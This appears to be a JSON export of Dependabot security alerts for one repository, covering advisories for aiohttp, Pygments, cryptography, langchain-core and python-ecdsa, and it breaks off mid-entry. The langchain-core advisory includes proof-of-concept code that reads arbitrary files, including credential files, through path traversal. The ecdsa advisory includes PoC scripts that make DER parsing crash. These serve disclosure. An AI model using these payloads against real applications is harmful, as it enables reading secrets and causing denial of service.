https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145","severity":"low","identifiers":[{"value":"GHSA-3wq7-rqq7-wx6j","type":"GHSA"},{"value":"CVE-2026-34517","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-3wq7-rqq7-wx6j"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34517"},{"url":"https://github.com/aio-libs/aiohttp/commit/cbb774f38330563422ca0c413a71021d7b944145"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-3wq7-rqq7-wx6j"}],"published_at":"2026-04-01T21:47:07Z","updated_at":"2026-04-01T21:47:08Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00056,"percentile":0.17179},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/110","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/110","created_at":"2026-05-13T05:27:17Z","updated_at":"2026-05-13T05:27:17Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":109,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-m5qp-6w8w-w647","cve_id":"CVE-2026-34516","summary":"AIOHTTP has a Multipart Header Size Bypass","description":"### Summary\n\nA response with an excessive number of multipart headers may be allowed to use more memory than intended, potentially allowing a DoS vulnerability.\n\n### Impact\n\nMultipart headers were not subject to the same size restrictions in place for normal headers, potentially allowing substantially more data to be loaded into memory than intended. However, other restrictions in place limit the impact of this vulnerability.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f","severity":"medium","identifiers":[{"value":"GHSA-m5qp-6w8w-w647","type":"GHSA"},{"value":"CVE-2026-34516","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-m5qp-6w8w-w647"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34516"},{"url":"https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-m5qp-6w8w-w647"}],"published_at":"2026-04-01T21:43:07Z","updated_at":"2026-04-06T23:12:07Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/109","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/109","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":108,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-p998-jp59-783m","cve_id":"CVE-2026-34515","summary":"AIOHTTP affected by UNC SSRF/NTLMv2 Credential Theft/Local File Read in static resource handler on Windows","description":"### Summary\n\nOn Windows the static resource handler may expose information about a NTLMv2 remote path.\n\n### Impact\n\nIf an application is running on Windows, and using aiohttp's static resource handler (not recommended in production), then it may be possible for an attacker to extract the hash from an NTLMv2 path and then extract the user's credentials from there.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d","severity":"medium","identifiers":[{"value":"GHSA-p998-jp59-783m","type":"GHSA"},{"value":"CVE-2026-34515","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-p998-jp59-783m"},{"url":"https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34515"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-p998-jp59-783m"}],"published_at":"2026-04-01T21:26:36Z","updated_at":"2026-04-06T16:47:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U","score":6.6}},"epss":{"percentage":0.00066,"percentile":0.20264},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-36","name":"Absolute Path Traversal"},{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/108","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/108","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":107,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-2vrm-gr82-f7m5","cve_id":"CVE-2026-34514","summary":"AIOHTTP has CRLF injection through multipart part content type header construction","description":"### Summary\n\nAn attacker who controls the `content_type` parameter in aiohttp could use this to inject extra headers or similar exploits.\n\n### Impact\n\nIf an application allows untrusted data to be used for the multipart `content_type` parameter when constructing a request, an attacker may be able to manipulate the request to send something other than what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06","severity":"low","identifiers":[{"value":"GHSA-2vrm-gr82-f7m5","type":"GHSA"},{"value":"CVE-2026-34514","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5"},{"url":"https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34514"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-2vrm-gr82-f7m5"}],"published_at":"2026-04-01T21:20:06Z","updated_at":"2026-04-06T16:46:52Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00043,"percentile":0.12846},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/107","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/107","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":106,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-hcc4-c3v8-rx92","cve_id":"CVE-2026-34513","summary":"AIOHTTP Affected by Denial of Service (DoS) via Unbounded DNS Cache in TCPConnector","description":"### Summary\n\nAn unbounded DNS cache could result in excessive memory usage possibly resulting in a DoS situation.\n\n### Impact\n\nIf an application makes requests to a very large number of hosts, this could cause the DNS cache to continue growing and slowly use excessive amounts of memory.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98","severity":"low","identifiers":[{"value":"GHSA-hcc4-c3v8-rx92","type":"GHSA"},{"value":"CVE-2026-34513","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-hcc4-c3v8-rx92"},{"url":"https://github.com/aio-libs/aiohttp/commit/c4d77c3533122be353b8afca8e8675e3b4cbda98"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34513"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-hcc4-c3v8-rx92"}],"published_at":"2026-04-01T21:19:22Z","updated_at":"2026-04-06T16:46:47Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/106","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/106","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":105,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-w2fm-2cpv-w7v5","cve_id":"CVE-2026-22815","summary":"aiohttp allows unlimited trailer headers, leading to possible uncapped memory usage","description":"### Summary\n\nInsufficient restrictions in header/trailer handling could cause uncapped memory usage.\n\n### Impact\n\nAn application could cause memory exhaustion when receiving an attacker controlled request or response. A vulnerable web application could mitigate these risks with a typical reverse proxy configuration.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36","severity":"medium","identifiers":[{"value":"GHSA-w2fm-2cpv-w7v5","type":"GHSA"},{"value":"CVE-2026-22815","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-w2fm-2cpv-w7v5"},{"url":"https://github.com/aio-libs/aiohttp/commit/0c2e9da51126238a421568eb7c5b53e5b5d17b36"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22815"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-w2fm-2cpv-w7v5"}],"published_at":"2026-04-01T19:45:17Z","updated_at":"2026-04-06T16:46:37Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N","score":6.9}},"epss":{"percentage":0.00057,"percentile":0.17627},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/105","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/105","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":104,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"Pygments"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-5239-wwwm-4pmq","cve_id":"CVE-2026-4539","summary":"Pygments has Regular Expression Denial of Service (ReDoS) due to Inefficient Regex for GUID Matching","description":"A security flaw has been discovered in pygments before 2.20.0. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.","severity":"low","identifiers":[{"value":"GHSA-5239-wwwm-4pmq","type":"GHSA"},{"value":"CVE-2026-4539","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-4539"},{"url":"https://github.com/pygments/pygments/issues/3058"},{"url":"https://github.com/pygments/pygments"},{"url":"https://vuldb.com/?ctiid.352327"},{"url":"https://vuldb.com/?id.352327"},{"url":"https://vuldb.com/?submit.774685"},{"url":"https://github.com/pygments/pygments/pull/3064"},{"url":"https://github.com/pygments/pygments/commit/24b8aa76c6cd6d70f39c6dd605cce319c98e2ccc"},{"url":"https://github.com/pygments/pygments/releases/tag/2.20.0"},{"url":"https://github.com/advisories/GHSA-5239-wwwm-4pmq"}],"published_at":"2026-03-22T06:30:15Z","updated_at":"2026-03-30T14:40:30Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"Pygments"},"severity":"low","vulnerable_version_range":"< 2.20.0","first_patched_version":{"identifier":"2.20.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","score":3.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P","score":1.9}},"epss":{"percentage":7.0e-05,"percentile":0.00646},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L","score":3.3},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-1333","name":"Inefficient Regular Expression Complexity"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"Pygments"},"severity":"low","vulnerable_version_range":"< 2.20.0","first_patched_version":{"identifier":"2.20.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/104","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/104","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":103,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"cryptography"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-m959-cc7f-wv43","cve_id":"CVE-2026-34073","summary":"cryptography has incomplete DNS name constraint enforcement on peer names","description":"## Summary\n\nIn versions of cryptography prior to 46.0.5, DNS name constraints were only validated against SANs within child certificates, and not the \"peer name\" presented during each validation. Consequently, cryptography would allow a peer named `bar.example.com` to validate against a wildcard leaf certificate for `*.example.com`, even if the leaf's parent certificate (or upwards) contained an excluded subtree constraint for `bar.example.com`.\n\nThis behavior resulted from a gap between RFC 5280 (which defines Name Constraint semantics) and RFC 9525 (which defines service identity semantics): put together, neither states definitively whether Name Constraints should be applied to peer names. To close this gap, cryptography now conservatively rejects any validation where the peer name would be rejected by a name constraint if it were a SAN instead.\n\nIn practice, exploitation of this bypass requires an uncommon X.509 topology, one that the Web PKI avoids because it exhibits these kinds of problems. Consequently, we consider this a medium-to-low impact severity.\n\nSee CVE-2025-61727 for a similar bypass in Go's `crypto/x509`.\n\n## Remediation\n\nUsers should upgrade to 46.0.6 or newer. \n\n## Attribution\n\nReporter: @1seal","severity":"low","identifiers":[{"value":"GHSA-m959-cc7f-wv43","type":"GHSA"},{"value":"CVE-2026-34073","type":"CVE"}],"references":[{"url":"https://github.com/pyca/cryptography/security/advisories/GHSA-m959-cc7f-wv43"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34073"},{"url":"https://github.com/advisories/GHSA-m959-cc7f-wv43"}],"published_at":"2026-03-27T19:56:21Z","updated_at":"2026-04-06T23:13:03Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"low","vulnerable_version_range":"< 46.0.6","first_patched_version":{"identifier":"46.0.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","score":5.3},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":1.7}},"epss":{"percentage":9.0e-05,"percentile":0.0084},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-295","name":"Improper Certificate Validation"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"low","vulnerable_version_range":"< 46.0.6","first_patched_version":{"identifier":"46.0.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/103","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/103","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":102,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-qh6h-p6c9-ff54","cve_id":"CVE-2026-34070","summary":"LangChain Core has Path Traversal vulnerabilites in legacy `load_prompt` functions","description":"## Summary\n\nMultiple functions in `langchain_core.prompts.loading` read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to `load_prompt()` or `load_prompt_from_config()`, an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (`.txt` for templates, `.json`/`.yaml` for examples).\n\n**Note:** The affected functions (`load_prompt`, `load_prompt_from_config`, and the `.save()` method on prompt classes) are undocumented legacy APIs. They are superseded by the `dumpd`/`dumps`/`load`/`loads` serialization APIs in `langchain_core.load`, which do not perform filesystem reads and use an allowlist-based security model. As part of this fix, the legacy APIs have been formally deprecated and will be removed in 2.0.0.\n\n## Affected component\n\n**Package:** `langchain-core`\n**File:** `langchain_core/prompts/loading.py`\n**Affected functions:** `_load_template()`, `_load_examples()`, `_load_few_shot_prompt()`\n\n## Severity\n\n**High** \n\nThe score reflects the file-extension constraints that limit which files can be read.\n\n## Vulnerable code paths\n\n| Config key | Loaded by | Readable extensions |\n|---|---|---|\n| `template_path`, `suffix_path`, `prefix_path` | `_load_template()` | `.txt` |\n| `examples` (when string) | `_load_examples()` | `.json`, `.yaml`, `.yml` |\n| `example_prompt_path` | `_load_few_shot_prompt()` | `.json`, `.yaml`, `.yml` |\n\nNone of these code paths validated the supplied path against absolute path injection or `..` traversal sequences before reading from disk.\n\n## Impact\n\nAn attacker who controls or influences the prompt configuration dict can read files outside the intended directory:\n\n- **`.txt` files:** cloud-mounted secrets (`/mnt/secrets/api_key.txt`), `requirements.txt`, internal system prompts\n- **`.json`/`.yaml` files:** cloud credentials (`~/.docker/config.json`, `~/.azure/accessTokens.json`), Kubernetes manifests, CI/CD configs, application settings\n\nThis is exploitable in applications that accept prompt configs from untrusted sources, including low-code AI builders and API wrappers that expose `load_prompt_from_config()`.\n\n## Proof of concept\n\n```python\nfrom langchain_core.prompts.loading import load_prompt_from_config\n\n# Reads /tmp/secret.txt via absolute path injection\nconfig = {\n \"_type\": \"prompt\",\n \"template_path\": \"/tmp/secret.txt\",\n \"input_variables\": [],\n}\nprompt = load_prompt_from_config(config)\nprint(prompt.template) # file contents disclosed\n\n# Reads ../../etc/secret.txt via directory traversal\nconfig = {\n \"_type\": \"prompt\",\n \"template_path\": \"../../etc/secret.txt\",\n \"input_variables\": [],\n}\nprompt = load_prompt_from_config(config)\n\n# Reads arbitrary .json via few-shot examples\nconfig = {\n \"_type\": \"few_shot\",\n \"examples\": \"../../../../.docker/config.json\",\n \"example_prompt\": {\n \"_type\": \"prompt\",\n \"input_variables\": [\"input\", \"output\"],\n \"template\": \"{input}: {output}\",\n },\n \"prefix\": \"\",\n \"suffix\": \"{query}\",\n \"input_variables\": [\"query\"],\n}\nprompt = load_prompt_from_config(config)\n```\n\n## Mitigation\n\n**Update `langchain-core` to >= 1.2.22.**\n\nThe fix adds path validation that rejects absolute paths and `..` traversal sequences by default. An `allow_dangerous_paths=True` keyword argument is available on `load_prompt()` and `load_prompt_from_config()` for trusted inputs.\n\nAs described above, these legacy APIs have been formally deprecated. Users should migrate to `dumpd`/`dumps`/`load`/`loads` from `langchain_core.load`.\n\n## Credit\n\n- [jiayuqi7813](https://github.com/jiayuqi7813) reporter\n- [VladimirEliTokarev](https://github.com/VladimirEliTokarev) reporter\n- [Rickidevs](https://github.com/Rickidevs) reporter\n- Kenneth Cox (cczine@gmail.com) reporter","severity":"high","identifiers":[{"value":"GHSA-qh6h-p6c9-ff54","type":"GHSA"},{"value":"CVE-2026-34070","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-qh6h-p6c9-ff54"},{"url":"https://github.com/langchain-ai/langchain/commit/27add913474e01e33bededf4096151130ba0d47c"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core==1.2.22"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34070"},{"url":"https://github.com/advisories/GHSA-qh6h-p6c9-ff54"}],"published_at":"2026-03-27T19:45:00Z","updated_at":"2026-03-31T18:41:15Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"< 1.2.22","first_patched_version":{"identifier":"1.2.22"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00035,"percentile":0.10523},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","score":7.5},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"high","vulnerable_version_range":"< 1.2.22","first_patched_version":{"identifier":"1.2.22"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/102","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/102","created_at":"2026-05-13T05:27:16Z","updated_at":"2026-05-13T05:27:16Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":101,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ecdsa"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-9f5j-8jwj-x28g","cve_id":"CVE-2026-33936","summary":"python-ecdsa: Denial of Service via improper DER length validation in crafted private keys","description":"## Summary\n\nAn issue in the low-level DER parsing functions can cause unexpected exceptions to be raised from the public API functions.\n\n1. `ecdsa.der.remove_octet_string()` accepts truncated DER where the encoded length exceeds the available buffer. For example, an OCTET STRING that declares a length of 4096 bytes but provides only 3 bytes is parsed successfully instead of being rejected.\n\n2. Because of that, a crafted DER input can cause `SigningKey.from_der()` to raise an internal exception (`IndexError: index out of bounds on dimension 1`) rather than cleanly rejecting malformed DER (e.g., raising `UnexpectedDER` or `ValueError`). Applications that parse untrusted DER private keys may crash if they do not handle unexpected exceptions, resulting in a denial of service.\n\n## Impact\n\nPotential denial-of-service when parsing untrusted DER private keys due to unexpected internal exceptions, and malformed DER acceptance due to missing bounds checks in DER helper functions.\n\n## Reproduction\n\nAttach and run the following PoCs:\n\n### poc_truncated_der_octet.py\n\n```python\nfrom ecdsa.der import remove_octet_string, UnexpectedDER\n\n# OCTET STRING (0x04)\n# Declared length: 0x82 0x10 0x00 -> 4096 bytes\n# Actual body: only 3 bytes -> truncated DER\nbad = b\"\\x04\\x82\\x10\\x00\" + b\"ABC\"\n\ntry:\n body, rest = remove_octet_string(bad)\n print(\"[BUG] remove_octet_string accepted truncated DER.\")\n print(\"Declared length=4096, actual body_len=\", len(body), \"rest_len=\", len(rest))\n print(\"Body=\", body)\n print(\"Rest=\", rest)\nexcept UnexpectedDER as e:\n print(\"[OK] Rejected malformed DER:\", e)\n```\n\n- Expected: reject malformed DER when declared length exceeds available bytes\n- Actual: accepts the truncated DER and returns a shorter body\n- Example output:\n```\nParsed body_len= 3 rest_len= 0 (while declared length is 4096)\n```\n\n### poc_signingkey_from_der_indexerror.py\n\n```python\nfrom ecdsa import SigningKey, NIST256p\nimport ecdsa\n\nprint(\"ecdsa version:\", ecdsa.__version__)\n\nsk = SigningKey.generate(curve=NIST256p)\ngood = sk.to_der()\nprint(\"Good DER len:\", len(good))\n\n\ndef find_crashing_mutation(data: bytes):\n b = bytearray(data)\n\n # Try every OCTET STRING tag position and corrupt a short-form length byte\n for i in range(len(b) - 4):\n if b[i] != 0x04: # OCTET STRING tag\n continue\n\n L = b[i + 1]\n if L >= 0x80:\n # skip long-form lengths for simplicity\n continue\n\n max_possible = len(b) - (i + 2)\n if max_possible <= 10:\n continue\n\n # Claim more bytes than exist -> truncation\n newL = min(0x7F, max_possible + 20)\n b2 = bytearray(b)\n b2[i + 1] = newL\n\n try:\n SigningKey.from_der(bytes(b2))\n except Exception as e:\n return i, type(e).__name__, str(e)\n\n return None\n\n\nres = find_crashing_mutation(good)\nif res is None:\n print(\"[INFO] No exception triggered by this mutation strategy.\")\nelse:\n i, etype, msg = res\n print(\"[BUG] SigningKey.from_der raised unexpected exception type.\")\n print(\"Offset:\", i, \"Exception:\", etype, \"Message:\", msg)\n```\n\n- Expected: reject malformed DER with `UnexpectedDER` or `ValueError`\n- Actual: deterministically triggers an internal `IndexError` (DoS risk)\n- Example output:\n```\nResult: (5, 'IndexError', 'index out of bounds on dimension 1')\n```\n\n## Suggested fix\n\nAdd “declared length must fit buffer” checks in DER helper functions similarly to the existing check in `remove_sequence()`:\n\n- `remove_octet_string()`\n- 